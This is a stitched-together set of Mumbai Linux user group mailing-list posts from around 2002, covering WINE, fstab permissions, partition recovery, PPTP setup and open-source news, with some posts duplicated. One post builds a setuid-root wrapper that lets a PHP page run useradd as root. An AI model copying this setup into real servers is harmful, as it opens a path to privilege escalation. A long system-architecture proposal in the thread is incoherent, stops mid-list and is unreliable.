some one change my (susi linux 7.1) root password so i could not enter into root please tell me how can i enter. it will display file sytem error give root password for repair . the repair command is fsck /dev/fd9 but how can i enter it will not display (root prompt #)after give root passwprd if will fix the bug and it will display file system repaired then next time i can enter into root.so plese tell me. prasant

C and emacs

hi there, Can i look at values of constants or expressions, probably from an another file, say a header or somthing, using emacs. I guess it would involve going going through all the #defines or constructs in the header files ? Faster Startup of apps

Hi, About one year back in a Mandrake mailing-list one of the developer pointed out that they could not keep programs in memory as windows does with IE, so apps take longer to startup on unices. I was willing to keep some of the apps in memory and let them occupy my memory in favour of faster startups of those apps. I have not idea how to do this. Any clues on how this can be accomplished? Presently I am using Mandrake 9.0 on AMD K6-2 500Mhz, 160MB RAM. I would like a generic solution that can be applied on any distribution or unix rather than a Mandrake specific solution. Thanks in advance. Bye.

I am currently overseeing the IT operations of a leading construction company in Mumbai. After following linux in general and open source software in particular, I believe one question would have crossed people's mind at least once: Can there ever, single image deployable distribution, be made? In other words, can a single distribution fit all? In the process of following up various development in the OSS and after a study of REAL and PRACTICAL computing requirements, I found out that there is very little integrated approach to the open source computing architecture. White or Black component not needed in pure colour space as the temperature, as percieved, could be essentially noise caused due to superimposition of the various waves from the invisible electromagnetic spectrum. For clarity sake the data for coordinates may be represented by Pure 7-bit ASCII at a higher level as each point at the most may require 22 bytes. (7x3) + 1 for colour (known light speed 300,000,000,000 mm/s) (To be used as Address in the device space) ( Comment on Practical Dimensions: 524 meters in X Y and Z dimensions > 1/2 KM media? -- Devices are still not available! ) Graphic Primitive Processing: Processing is by reading the co-ordinate and doing a binary recursion as specified above for either vectorising or rasterising depending on the device. Start at device Origin, Recurse along the X axis, at the end of device limit, switch axis to Y and then in Z axis, Return to Origin. Graphic Computational speed & predictability: As the binary recursion algorithm has the known termination condition under all circumstances, it can be safely said that rendering for worst case of two adjecent pixels P0(0,0,0 - R1G1B1) and P1(0,0,1 - R2G2B2), only the end points needs to be taken and the maximum iterations will be 6 * 13 = 78 iterations. In the proposed architecture it will take 78 clock cycles to render one graphic primitive primitive. Worst case will be one bit change in each of the succesive pixel. Proof of Efficiency of algorithms are to mathematically proved. O(n) to be obtained mathematically. {-- Proof? who? me? No, Sorry! I am mathematically challenged :-) } Network Layers (OSI based - Total 7) Physical (7 total): (Criteria: Speedwise and vicinity wise decreasing order) CPU-Internal-Registers (CPU/memory Bus(0)), CPU-RAM / Display path (1), CPU-System Bus (Sound card video capture) (2), Disk bus : SCSI, fibre channel (3) Ethernet (4), IR/Wireless (5), Serial Port (6) (allows use of local phone lines for PPP) Network: Ring 0 = Register Ring 1 = Cache Ring 2 = RAM Ring 3 = RAM Ring 4 = HDD Transport: Presention Translation???? Application Scheduling algorithm. There are three states to this machine: 0. Running 1. Preparatory 2. Wait 3. Review 4. Reorder Priority 5. Cycle complete The time slice ratio for these recommended are 20, 75, 12, 13 (total 120) clock cycles respectively 0. Running In this state the process is actually run 1. Preparatory In this state the necessary resource allocations for running the process is prepared 1. Read the Process Table 2. allocate necessary resources 3. signal to run the process 2. Wait State This is the stage the machine execute the heartbeat function which consists of 1. read any error status from the heartbeat messages of other nodes 2. prepare the status report 3. write error / log messages in the respective locations 3. Review In this state, the messages after running of the process and the necessary steps for transmitting the messages to the next process are taken 4. Reorder states In this stage, the states of the two processes are altered (If the state of the process 0 is 0123 then 1032 and of the process 1 is 1032 change to 0123) 5. Cycle Complete state In this state the Necessary logging of Machine state and heartbeat, Cycle No Detail Stamping is to be taken care of (Fill details here) 6. State Increment State This is the crucial state where the promotion of state is done. 7. respawn state process with incremented states will launch itself ??? (Fill in properly) In between these state is the idle state. The suggested scheduling is sequence (In the Real time) 0-->1-->1-->0-->0-->1-->2-->2-->1-->0-->0-->1-->2; 1-->2-->2-->1-->1-->2-->3-->3-->2-->1-->1-->2-->3. (VM1) | v 5 | v 6 | v 7 (This is binary recursion with the termination condition that both the neighbours of the tree are found.) Directed graph representation of states (Root) (0) / \ (1) (2) \ (3) If the inversion of 0 & 1 states are not done the machine will enter a be running uncontrollably with the binary recursion algorithm that is used for task scheduling. The head-inversion causes two breaks. The task is deemed completed only after machine enters the Idle State. In fact this data structure and processing can be replicated in the upper rings which will result in predictable performance. Performence factors are to be worked out mathematically. Implementation, & Availability Issues ------------------------------------------------- the two Ring-1 tasks are two identical clustered virtual machines using MOSIX or any other similar Kernel pathces. The clustering of one box with another is thru SCSI or System bus. (so there can be a single box high performance Cluster). Fibre channel/100mbps n/w media is the second option. Each machine is identical to each other in function. they communicate using Registers as network media. The proposed machine's will a Replicated, jounalled, file system. Where two disks are available, RAID Technology should be used. There is only one login and two directories for each person. The network is Purely a private network (IP address Space) with network path to Internet wherever necessary. It is envisaged that, by carefully planning each node's IP address and their neighbours, We will never run out of Private IP Address. The only data flowing in this network (if all participating machines are according to this architecture) will be 7-bit ASCII text The the most secure network protocol with PGP signature is suggested for base configuration. The User Authentication / configuration management is to be managed with LDAP. This include machine specific optimised utilities for highest degree of interoperability. All the network listen channel should act as an input device (stdin). All the network talk channels should act as an output device (stdout). All the network error channels should act as on error device (stderr). Hardware: The machine should be able to use the following as the network media: Register, Cache, System Bus, SCSI, NIC, Serial port, Parallel port, Sound (can be picked up thru System Bus), Optical & Wireless The machine should be able to draw energy out of following sources: Electrical, optical, Solar, chemical, Sound (if possible) The network and energy source path can be the same. Each of the machine will have a compute node, storage node and varied network paths as described above. Each node participating in this computer will have exactly one path for talk and listen. It should be able to Talk/listen through any of external network port to any other machine. All the network node will have fixed addresses for each network port. The base machine itself will have One IP address Networking protocols supported will be TCP/IP. Optionally IPX/SPX and NCP may be supported. Network Environment As the Machine is always in listen mode for message and talks only when required, the network bandwith requirements are based on three parameters associated with the message processing: 1. Path 2. Quanta 3. Frequency The aim is to select path in such a way that the product of quanta and frequency, (which gives the total message size) is transmitted through the network physical layer within user-acceptable time frame. The most common information formats are (in decreasing order of bandwidth requierement): 1. Video 2. Sound 3. Structured Text 4. Cosidering the common applications a correspondance table can made as follows: Network environment supports System environment GNU/Linux is suggested for is immense scalability and flexibility and most importantly configurability and its case sensitivess to file names as it is the heart of ITRANS encoding scheme for system filenames. All the networking code should be optimised into kernel. This machine will have at the primitive instrauction which will emulate the processing as described above. The base software which is suggested EMACS in its various incarnations as the self recursive nature of self-insert-command is what makes it the most extensible software. CVS at a lower level will ensure automatic journalling of all changes: textual and binary It is proposed that this machine will use ITRANS envelope for self-insert-command. This will ensure that the machine will be able to translate Voice into ITRANS encoding. As Sanskrit is a phonetic language, and ITRANS a viable and very practical representation of phonetics, A user will just have to record the basic letters of sanskrit that will be stored for voice reproduction. The messages can then be displayed and user's interpretation of the message is recorded and stored as a parameter "mother toungue" of the user. This too can be embedded in kernel with a little bit of effort. ITRANS processing should also be part of kernel. This will reduce the bandwidth requirement for data as only encoded text is required to produce speech. (ITRANS processing does not require backstepping). The phonetic ITRANS atom is max. 3 characters. The Cosmological time recording system should be the base time machine for all time processing. Already Open Source libraries are available for this. (Solar, Lunar, Planetery positions, Phase of moon, galaxy coordinates etc.) conversion routines for various current time systems should be there. The name space (LDAP or PostgreSQL Implementation) Transaction Engine A Unit transaction is defined as recording of the changes related to an entity caused by an internal or external event reliably. The transaction model is essentialy an event driven model. A single table - Event log - is to be maintained which captures all the external and internal events Event Master table will enumerate all the possible events at the given level of operation. Name Master will enumerate all the possible names that can be encountered in the system. Each name will have backward and forward pointers. Backward pointers for Source of Name, Forward pointers for transformed entities. It will also have an alias property referring to its alias in the same table. Data model for transactions It essentially consists of two self referential entities. This model yields itself to self learning feature of EMACS which is intended as the primary front end. In a parametrised form, the data model can be viewed as given below (In Hierarchical Model -- Inverted Tree) An entity can be oen of the three types: Human or System or Physical Corresponding Human Entities are: Person / Organisation Unit / Organisation System Entities are (all are goals -- Desire): Functional / Organisational Unit / Organisation Functional Entities are: Person / Organisational Role / Processes Physical entity can be Person or Hardware or Message An entity is located at: Physical or Document or Network A message can be Requirement / Status / Event Messages in the Physical forms verbal / Internal / External (Images/Document) Requirement will arise through expression and when recognised, will go through following four states in the order specified on each event type as shown below: (C) (M) (T) Desire ---> Want ---> Need ---> Necessity Status state diagram will be the following (C) (M) (T) Initialisation ---> Running ---> Result ---> Logging Event State Diagram will be: Creation ---> Modification ---> Transformation ---> Wait ^ | | | +-------------------------------------------------+ A matrix of the above could be formed to obtain master table and transaction tables. It should be an orthogonal matrix to arrive at precise relations. at the lowest level,each Name has three properties: 1. Space Value 2. Money Value 3. Time Value Event Model A message triggers one or more or a combination thereof of the three events: 1. Creation 2. Modification 3. Transformation (into another name) The events Themselves are to be logged seperately in the audit trial table or event log table. These events causes insertion into the Transaction table with a time/location stamp. Any modification of any entity will cause also cause Transaction insertion. Transformation causes the change of name and an entry in the transaction table. After transformation the original entity ceases to exist for further transactions. Reports: Any kind of Report can be generated using a universal cross tabular reporting function from a normalised table of transaction. EMACS can be tweaked to be a report writer after EMACS isearch is modified with suitable atoms. (minimal effort..Lazy way out) In fact all the data may be stored in pure text as EMACS is Extremely good at handling pure text. Development tools: A suitable Development tool to define the Data model can be suitably designed for easy access of Data +++++++++++++++++++++++ REVIEW THOROUGHLY the following +++++++++++++++ (insert, update and delete thoughts only here) All the entities will have the followiong common attributes 1. Name 2. Location 3. Location timestamp 4. Type (Person) 5. Value Timestamp 6. Value (in Number) 7. Creation timestamp 8. Last Access begin timestamp 9. Last Access end timestamp 10. Last Modify begin timestamp 11. Last Modify end timestamp 12. Transformed to (target entity) 13. Transformation timestamp In the above scheme every entity has three phases: 1. Comes into existance at a given location at a given point of time with a given value at that point of time. 2. Its Value, location and other attributes may get modified over time which are recorded in the database 3. It finally gets transformed into another Name (after this go to step 1) A message is recorded along with every event that happens. A database of the following are to be available always: 1. Name of the entity 2. Value of the entity 3. Space of the entity (Add remaining database details here) A transaction engine which emulates the kernel in processing transaction. Transaction Engine will track Name, Message, Space, Value, state simultaneously and time / location stamp them. Each Transaction has four States: Initiation, Running, Sustanance and Perpetuality Each Message/Value transfer has Four State: Dire Needs, Actual, Key (for what???), Maintenence (of What?-- specify). Every transaction has four states at which money/material exchange occurs: 1. Initation 2. Actual 3. Result 4. Hi, I am kind of new to using PostgreSQL.I wrote a program which establishes a simple connection to the database by passing in three parameters; the database , username and password. I have created a postgres user and a have assigned it a password by using the createuser script. however running the program throws some exception which is as follows A connection error has occured: FATAL 1:No pg_hba.conf entry for host 127.0.0.1, user foo,database petshop and the first line of the stacktrace goes something like this at org.postgresql.jdbc1.AbstractJdbc1Connection:openConnection(.... Mozilla, Lynx, Konquerer ... etc are great for viewing websites. there are better mail clients so at the end of the day why do want to run M$ app from Linux when you have better alternatives. still if u want to use IE/ Office try using WINE - it does a decent job for lightweight M$ apps but u cant be sure as it is still in development. Using Dreamweaver with WINE

Hi Luggers, I tried using Dreamweaver with wine. However it is not working. Whenever I try to run any windows programs it throws up a kernel32.dll error. Does anybody know how to tackle this? problem with mounting of windows partition

Hello, i currently have rhl 7.3 installed on my system. i added the foll line to "/etc/fstab" "/dev/hda1 /mnt/win vfat auto,owner,user 0 0" this change mounts the win partition in the partition in the directory /mnt/win with the permissions 755 & root as the owner so that no other user gets the write permission but i want to give write permission to my normal user account so i tried the foll line "/dev/hda1 /mnt/win vfat auto,owner,user,rw 0 0" but it does not work so i tried adding the foll line to "/etc/rc.d/rc.local" "chmod -R 777 /mnt/win" this only increased my boot up time, but did not solve the problem this way i have to log in as the root 2 do even small changes am facing a lot of problems this way plz help!! -- Best regards, Pradnyesh mailto:pradnyesh@gmx.net

Wine, Dine and Network(tweak)ing

Hey all, Am new to the list and relatively new to Linux in general, though have been using it as my primary OS for quite sometime now and luv it :) I'm using Debian 3.0 with kernel 2.4.18 and my research interest is in the field of Natural Language Processing (NLP) - a subset of AI. I have my open source project called Mother (http://mother.sourceforge.net) Have a few queries and would really appreciate if I could get some help on them : a) Over a period of time have been trying to follow the Wine project and it's progress. I'm quite impressed by it. Recently I've been trying to install Office 97 on it using wine-20021125 and the installation fails after it searches for installed components. Any ideas on how to get it goin?....and I use OpenOffice and just wanna see if I can get this going to guage the progress of Wine (basically trying to see how long it'd be before I can run my VB based inventory software at work which is currently under development under Linux....then I can run Linux at work :) ). The Wine newsgroup doesn't seem to respond to this, however there are ppl who say Office 97 is running for them....if anyone here knows how then i'd appreciate. b) I have a Realtek 8139 based NIC and it runs great. I'm using the BSES Powersurfer Broadband service. I get speeds similar to those I get under Windows and was wondering if there's tweaking I can do that'd help improve that. My network interface comes up during bootup as set in half-duplex mode....is that due to the card? or due to the network?? basically can I set this to full duplex? or is there any other way to significantly improve speeds. c) The Konqueror file browser upon trying to unzip a .tar.gz file seems to do it very very slowly, for huge files, when compared to the tar utility. Is that a bug or is there something i should do to set it right? d) Anyone here knows of any project (or app) that aims to bring Voice Chatting abilities to MSN clones under Linux. I know the aboves quite a long list of questions.....thanks a lot in advance for all the help. Bye for now

MBR / Partition table woes

Has anyone recoverd a partion table with a tool called "gpart". This tool scans the entire disk block by block looking for partition begin patterns. The guesses can then be used to recreate the partition table by hand. A friend of mine wanted to reinstall Win2000 on a dual boot machine. The (fateful) sequence of events: --------------------------------- 1. I copied the first sector of /dev/hda to a file /root/MBR.grub using dd. 2. Booted from the Win2K CDROM and installed Win2K. 3. Try booting. No grub. Directly goes on and boots Windows. 4. Booted from RedHat 7.3 CDROM, entered rescue mode. It recognised the existing linux partitions. Copied the first sector of /dev/hda to /root/MBR.win, again using dd. Then copied the /root/MBR.grub to /dev/hda. 5. Try booting. Grub appears. Enter Linux choice - boots Linux properly. But when Windows is selected in grub, it pops up Grub again. 6. Again booted using RedHat CDROM. Copied /root/MBR.win to /dev/hda. 7. Try booting. Nothing. Just a blank screen. No error messages. 8. Panic. 9. Try booting using RedHat CDROM. Now it doesn't find any Linux partitions. Only raw device /dev/hda available. 10. Panic! 11. Compile "gpart" on another machine and transferred it to this m/c using a floppy. (in Linux rescue mode). Started gpart. I will try and get the output of gpart and post it here. Any help, advice will be appreciated. - Chetan

Removing prefix from subject

Hi all, I have been using Linux for more than 3 years now, and joined this mailing list around 2 weeks back. I have a small suggestion. Can we remove the [ILUG-BOM] prefix in the subject of all mails in the list as it reduces readability in the index of messages. Is there any specific reason why it exists? It would be cool if someone could point that out. What I really think this idea is useful for is to use an existing mailing list software eg. Mailman, and to modify an exisiting option on it: (disable delivery :: on/off) to something like (Mail Delivery:: On/POP3/Off). So those who want can still get SMTP messages, those who don't want can disable mails totally. The killer app is when you are away for a time, and turn POP3 on for the duration. When you get back, just download the messages for the duration from POP3; this means your real mailbox is never full or don't receive soemthing like 200 messages which is quite possible ;-) And if you disable you cannot get them at all, and have to browse from the web or something. so best of both worlds :-) I'd like to help for this idea, but as I suspect Mailman is in Python it'll take a bit of time to get used to it and I'll do it after my exams, something like after Jan 15. imho there is no point in writing something new, it may not be as well tested or known, just modify some already existing and working software (Mailman) to do what we need :-) Regards, - A. ---------------------------------------------------- There is no stability in life, but only opportunity.

The solution that I have though is, the mailing list server maintains a index of all the available messages it has received right from the time the server started functioning, whenever a member wants to receve mails then he can connect to the mailing list server using his normal POP client and the server will respond back using the POP protocol. The server will not have a normal POP server running but will actually be a part of the mailing list software that can provide virtual POP, now for each member of the mailing list there will be a index maintained by the mailing list server. In this index there will be account of the messages that the member has not yet received, only those messges will be given to him as new messages. Extracting data from a .GDB file

Hi Luggers...:-)) I have a .GDB file containing some data. I want to extract that data to a MySQL database or to a flat file. I have never worked with a .GDB file. Some amount of googlizing had led me to believe that .GDB extension is used by Interbase for its database files. How do I get the data out of that GDB file? I don't have Interbase installed on my Linux m/c. Can I still access the data in the file? Hi, I just realized that uu.net (appear so me to be an ISP) has many spamers are their clients. I am wondering what is the solution to this. If a spammer will signup for a account from uu.net then he can authenticate himself and send spams to many people. How can uu.net stop this? It appears to me that uu.net is listed as a spaming domain (sorry for this slang language but I do not have the proper term for this) and mails from this domain are not accepted if we disable the mail delivery from blacklisted domains. How can I as a sysadmin make sure that uu.net spams are not welcomed but genuine users from uu.net are no problems. Thanks in advance. Bye.

Wine,Dine and Network(tweak)ing

Hey all, Am new to the list and relatively new to Linux in general, though have been using it as my primary OS for quite sometime now and luv it :) I'm using Debian 3.0 with kernel 2.4.18 and my research interest is in the field of Natural Language Processing (NLP) - a subset of AI. I have my open source project called Mother (http://mother.sourceforge.net) Have a few queries and would really appreciate if I could get some help on them : a) Over a period of time have been trying to follow the Wine project and it's progress. I'm quite impressed by it. Recently I've been trying to install Office 97 on it using wine-20021125 and the installation fails after it searches for installed components. Any ideas on how to get it goin?....and I use OpenOffice and just wanna see if I can get this going to guage the progress of Wine (basically trying to see how long it'd be before I can run my VB based inventory software at work which is currently under development under Linux....then I can run Linux at work :) ). The Wine newsgroup doesn't seem to respond to this, however there are ppl who say Office 97 is running for them....if anyone here knows how then i'd appreciate. b) I have a Realtek 8139 based NIC and it runs great. I'm using the BSES Powersurfer Broadband service. I get speeds similar to those I get under Windows and was wondering if there's tweaking I can do that'd help improve that. My network interface comes up during bootup as set in half-duplex mode....is that due to the card? or due to the network?? basically can I set this to full duplex? or is there any other way to significantly improve speeds. c) The Konqueror file browser upon trying to unzip a .tar.gz file seems to do it very very slowly, for huge files, when compared to the tar utility. Is that a bug or is there something i should do to set it right? d) Anyone here knows of any project (or app) that aims to bring Voice Chatting abilities to MSN clones under Linux. I know the aboves quite a long list of questions.....thanks a lot in advance for all the help. Bye for now

Hello all, Approx a week back I got the info that I need to use a C program to execute a command a root for web scripts (PHP). I have given that a try, I created a addnewhost.cpp : #include <stdlib.h> int main() { system("/usr/sbin/useradd newusernewuser"); return 0; } Compiled, linked and suid it as (Did this as root) g++ -c addnewhost.cpp g++ -o addnewhost.bin addnewhost.o chown root.root addnewhost.bin chmod 4755 addnewhost.bin But when I try to run the addnewhost.bin as a normal user it says useradd: unable to lock password file But runs fine as root. Any clues where should I go next. All I need to do is execute some command as a superuser but from a PHP page. Thanks in advance. Bye.

Hi all, We can have a LUG meet at KReSIT, IIT Bombay on the 8th of Dec if all are interested. We have a choice between a classroom that can seat 50 people and the audi that can seat 200. I have temporarily booked both. Gods of the list, please confirm the meet, so that I can also announce on the IITB newsgroups. Is Sunday 4pm fine? Dear Devendra, Go to http://www.poptop.org & download the 1.01 version of PPTP.tar.gz file. rgds girish Hi I have been trying to make my Linux kernel MPPE and PPTP aware. Tried downloading the i386.rpms (for pptp and mppe) from pptpclient.sourceforge.net and proceeded as per the James Cameron's howto (for Psyche - RH 8.0). http://pptpclient.sourceforge.net/howto-redhat-80.phtml But, after proceeding through the entire cycle of rebuilding kernel modules et al, I still get a message (from pptp-command) that kernel is not supporting pptp. a) pppd daemon does not start...same excuse. Kernel release version 2.4.18-14 b) On further investigation (modprobe -v pptp or mppe); it shows up an error in a file called ppp_generic.o saying 'uresolved symbol' at various lines of code. c) # kernel-modules/kmodinst.sh kernel-modules/new-2.4.18-14/ When i perform this action ...module dependencies command returns some errors. Has anyone had any success in the same? Pls help...as I need to connect to my Cable ISP's VPN box (thru ethernet) to access email. Hi, Sorry for the late reply, i was not available to read my mails and answer them over the week. Well, I think I sparked off an unnecessary argument over "Commercialisation". Am with Trover. Generally LUGs are supposed be there, so that we can SHARE knowldge. What I meant by Commercial interests in some LUGs is that, some of them are promoted and funded/aided by commercial organizations, with an optional internal MOTO. This is what I meant by "commercial LUG", and not charging for help mails.. Hey come on... even M$ gives FREE help over newsgroups...!!!!! (surprising, but it does give, SOMETIMES). Of course, if any one wants to go in person and help them, or have their own interests, in answering a question, they can do it in a commercial way..... Commercial ILUG

Hi, Natrajan's information regarding ILUG Chennai sent a lot of my cells racing. I agree that free support is a good thing. But then what about the people whom we support that work for commercial organizations? Lets take a hypothetical case: Mr. A works for ABC Corp. who has investments in Linux in terms of development, support and even customers. Now Mr. A is a fresher and doesn't know GNU/Linux much... a Perl based project comes up, and then he runs helter skelter for help. Mr. Cool is cool with GNU/Linux and yes he knows Perl! Mr. Cool helps Mr. A out with difficulties... and ABC Corp doles the project out... because Mr. A completed it on time. Mr. A agined... ABC Corp. gained... what did Mr. Cool gain? Now I am not cool with that. Maybe I won't go with what ILUG Chennai does... but yes maybe we can charge support requests from commerical organisations. (That will help me tolerate those irritating signatures). Charging will also mean one more thing... people will look carefully at the list archives before winging something in. Regards, -ah

Group urges limits on open source

The U.S. Defense Department should think twice before embracing open-source software, a trade association is advising. The Initiative for Software Choice, which counts Microsoft, Cisco Systems and Intel among its backers, said in comments filed Tuesday that the department should "avoid crafting needless and potentially detrimental IT policy to promote the use" of open-source software. "Open source" means every software developer can view the source code for software, modify it, and use it for free. The initiative, which launched in May and is chaired by a group called CompTIA, an organization that has close ties to Microsoft, is worried about a recent report that concluded the Defense Department relies on open-source software and recommended its further adoption. Written by defense contractor MITRE, the report said that free and open-source software "plays a more critical role in the (Defense Department) than has been generally recognized" and endorsed it as a viable alternative to proprietary Microsoft products. This week, the Initiative for Software Choice counterattacked, telling the Defense Information Systems Agency that the Pentagon should not "openly promote the use" of open-source software, arguing that proprietary products are not inherently less secure. The group also assailed the General Public License (GPL), which generally permits programmers to incorporate code released under the GPL as long as they make their own source code available. "While the law on this matter remains untested, it makes sense for companies to be highly risk-averse in this area, striking a more defensive posture when confronted with software development that may implicate GPL code or similar coding environments," the initiative said. "Commercial and hybrid software developers generally do not want to risk losing their investment." Proprietary software companies such as Microsoft have labeled open-source software as a serious threat and have begun to oppose its use by governments. Software license tied to human rights

Software distributed under an "enhanced source" license released this week will be legally prohibited from censoring or spying on users. Crafted by Hacktivismo, a hacking group organized by the Cult of the Dead Cow, the Hacktivismo enhanced-source software license agreement says that anyone using code released under it must respect privacy, free expression, due process and other human rights. HESSLA comes as concern is growing over governments using technology such as blocking software to restrict what their citizens can do or say online. In September, House Republicans released a report titled "Tear Down This Firewall," and this week, Amnesty International published a report highlighting China's crackdown on Internet use. "The Hacktivismo enhanced-source software license agreement marks the first time technology transfer has been linked to protecting human rights," said Oxblood Ruffin, founder of Hacktivismo. "Our clients and end-users aren't building the firewalls to keep democracy out. They're locked inside trying to break free." In July, Ruffin published a manifesto that referenced the United Nations' Universal Declaration of Human Rights and said Internet censorship is "a serious form of organized and systematic violence against citizens, is intended to generate confusion and xenophobia and is a reprehensible violation of trust." Hacktivismo's license says that any government that violates human rights is prohibited from using software released under it. The "enhanced source" license intentionally tracks much of the language of the well-known General Public License and borrows most of the GPL's concepts, such as the one that says anyone incorporating code released under the license in their program must also make the source code of their program available. In fact, Hacktivismo recommends that programmers release their code under both licenses. One problem Hacktivismo might encounter is that the current license is so broad it discourages developers from using it. For instance, it bans governments, individuals and corporations from any "monitoring of individuals," which might apply to popular network monitoring utilities, and bans "filtering" of any expression, which could cover routine utilities such as spam-filtering programs. Another section of the license requires that the creator of any program that uses cryptography for authentication or confidentiality must ensure that the algorithms meet minimum security thresholds. And if any disputes arise involving another nation, the license says, foreign governments relinquish their right of sovereign immunity and agree to be sued in federal court in the United States. The license enables both Hacktivismo and its end-users to go to court if someone tries to use the software in a malicious manner, or to introduce harmful changes into the software. It also contains more robust language than has previously been used to maximize enforcement against governments around the world. The HESSLA explicitly prohibits anybody from introducing "spyware, surveillance technology, or other undesirable code into modified versions of HESSLA-licensed programs." PPTP on Linux

Hi I have been trying to make my Linux kernel MPPE and PPTP aware. Tried downloading the i386.rpms (for pptp and mppe) from pptpclient.sourceforge.net and proceeded as per the James Cameron's howto (for Psyche - RH 8.0). http://pptpclient.sourceforge.net/howto-redhat-80.phtml But, after proceeding through the entire cycle of rebuilding kernel modules et al, I still get a message (from pptp-command) that kernel is not supporting pptp. a) pppd daemon does not start...same excuse. Kernel release version 2.4.18-14 b) On further investigation (modprobe -v pptp or mppe); it shows up an error in a file called ppp_generic.o saying 'uresolved symbol' at various lines of code. c) # kernel-modules/kmodinst.sh kernel-modules/new-2.4.18-14/ When i perform this action ...module dependencies command returns some errors. Has anyone had any success in the same? Pls help...as I need to connect to my Cable ISP's VPN box (thru ethernet) to access email. EXECUTIVE SUMMARY: To send better messages, please trim and summarize what you're replying to, and integrate your quoted text with the body of your message. Don't just put everything at the end. This isn't Jeopardy. People expect question-and-answer, not answer-and-question responses. LONG STORY: Wouldn't you like to make your messages easier for others to read and understand? If so, I have some news posting tips for you. If not, just ignore this. (Of course, if you don't want your messages easier to read and understand, it's not clear why you bother to send them in the first place. :-) I'm going to take a bit of time to explain this, because newcomers to Usenet often lack the cultural background were I to send a superbrief message. Here's the issue: you appear to have quoted the entire message to which you were replying. Worst of all, you have done so by merely appending the complete message at the bottom. Folks are used to reading the original material first, then the follow-up. That's why it's called a "follow-up", you know. :-) If all you want to do is forward a copy of the message, that's one thing, but here you seem to have just blindly pasted the complete old message at the end without providing any content. This is neither a proper public followup nor even a decent private reply. Here's why. First of all, this is massive overkill -- you're supposed to trim your quoted text to only what you're replying to. Otherwise you'll probably violate the netiquette target quoting percentage of 50%. See below. This isn't really an issue of space (I know that a few bytes here and there mean less today than 20 years go), so much as it is of integrating your comments with the old material for continuity. Second, putting everything at the bottom does little good. It doesn't provide the proper context. It's far too late. When you reply to someone's content, the reason you quote the previous message is so that you can provide some degree of contextual continuity. The best way to do this is to interleave what you're quoting with your responses to that particular piece. hi i had the same problem the ppp-mppe module u r trying to install doesnot work with this kernel(compiled with gcc 3.2 on rh 8.0) instead search for this srpm ppp-2.4.1-demand_script-0.4-3mppe.src.rpm i have this srpm and i had infact mailed it on this list but my mail got caught in red-tape do rpmbuild --rebuild ppp-2.4.1-demand_script-0.4-3mppe.src.rpm then install the rpm created in /usr/src/redhat/RPMS/i386/ then install pptpd then install pptp-linux edit /etc/ppp/pap-secrets add this line <your username> * <your password> * save the file then edit /etc/sysconfig/network-scripts/ifcfg-eth0 and change the gateway field to 0.0.0.0 or if it doesnot exist add the line GATEWAY='0.0.0.0' save it restart network then save this command as a script in ur /bin directory /sbin/modprobe -v ppp pptp 172.16.9.1 debug noauth user <username> +pap noauth mppe-40 mppe-128 mppe-stateless defaultroute give ifconfig u should see ip addresses for pp0,eth0 and lo if so u r done enjoy the net ===== ninad purohit have a nice day :-) ________________________________________________________________________ Missed your favourite TV serial last night? Desktop shortcuts and Menu Item for GNOME

Hi, I am not able to create Desktop shortcuts and Menu item in GNOME. I discovered that for both KDE and GNOME, its an accepted standard to have .desktop files to represent shortcuts. File contains group and name-value pairs like: [Desktop Entry] Name= Type= Comment= I created few files for KDE and all of them worked fine. But on GNOME I am not able to run them. My concern is to provide shortcuts to HTML files. I tried to create file like: [Desktop Entry] Name=MyLink Type=Link URL=file:/home/kshitij/myApp.html Icon=/usr/share/icons/html.xpm Terminal=false MultipleArgs=false Comment=Simple HTML File link It simply doesn't work. The icon is created on Desktop but can't be executed. Although it works absolutely fine on KDE. Help to query X !!

After the previous quick responses... I have one more small query again! Now , I want to query the X servers.. See.. what I have to do is this: I have a deamon running... Now I give it some username It first checks if the user is presntly logged in... (either on tty or on pts ). Then I determine the delay for which the user was idle on the terminals on which he has logged in... Currently , I am doing this for tty and pts only. Now, I pop up a window on the terminal(tty ; using ncurses) on which the user is logged on and has least idle time (similar to write command's working). My deamon also has the property to popup GUI windows on X screens. But now, I have this problem : How do I determine if the user is presently logged on X ? And if he is , which DISPLAY is he using ??? Is there something like utmp (which works for tty and pts records )... for X ? I want to determine if the user has least idle time on X or on tty/pts .. I wrote the code for tty.. but what abt X ??? Please guide me.. If you run it from a xterm window... The clock runs ... But if I run it from a tty.. ie the text terminal... it says "Error: Can't open Display" What is the problem ??? I want a simple program .. which must be able to exec a xclock on desktop ':0' ... when I run the program from text terminal (tty) logged in as root ! Hi, I have recompiled the Apache 1.3.20 to add the referer log modules of on our web server. ./httpd -l results Compiled-in modules: http_core.c mod_env.c mod_log_config.c mod_log_agent.c mod_log_referer.c mod_mime.c mod_negotiation.c mod_status.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_userdir.c mod_alias.c mod_rewrite.c mod_access.c mod_auth.c mod_setenvif.c mod_php4.c mod_dav.c suexec: disabled; invalid wrapper /usr/local/apache/bin/suexec I have also enabled the log format under httpd.conf with the result the logs files are referer_log file is created under /logs. The problem now is, this log file referer_log does not get updated when this server URL link is accessed from other Servers/Programs. Hi, I am Natarajan, and have come to Mumbai recently. One of the first things that I did was to subscribe to iLUG-BOM. I was and still a member of iLug Chennai. I would like to attend the meetings of ILUG-BOM. It would be nice if someone could throw some light on how to reach the place and such details... ( I am completely new to Mumbai, and Hindi is one of my weakpoints.). I would also like to know the general activities and strategy of the group. Network Speed Problem 10Mbps?

hi folks Well having problem with the network speed on linux 7.3, i get 70% packed loss on the local network. at the same time this machine also (dual boot) runs win2k pro and i dont have a problem with the network on windows. Hey guys, anything like this on the net (with code) ??? Its urgent ! Please help me out ! What I need is a messaging system like the net-send utility in wondows which will work on linux systems. There should be a deamon which on reception of a message from a client will show the message as a pop up screen if the user is logged in a GUI window manager. In case the intended user for the message is logged into the text terminal, the message should go to the terminal which was most recently used. There will be a client program which will allow entering a message for the destined user. The client program should be commandline based but will also have GUI interface to be used if the user is logged into a graphical window manager. It will also allow to save a directory of destination users containing the IP address, machine name and login names in a configuration file. Hi Kishore!, Thanks for spending Rs 2.00 by replying to my mail :P. As of the guidelines to the venues, I wasnt able to find any links in the website. That was the reason why I made the post. I heard that B'lore LUG is aided by commercial organizations, has a bank account of its own, and so on... Being new to Mumbai LUG, I was curious to know about that. After finding some time to go through some of the message archives, I do understand that Mumbai LUG is a bit similar to Chennai LUG. It would be nice, if you could give me the link/directions of the venue, and if possible including the train/bus routes etc... Kerberos uses principles, or structured names, for authorization, but left room in RFC1510 for vendor-based extensions, such as the one Microsoft designed. While this extension is not terribly useful on Unix systems 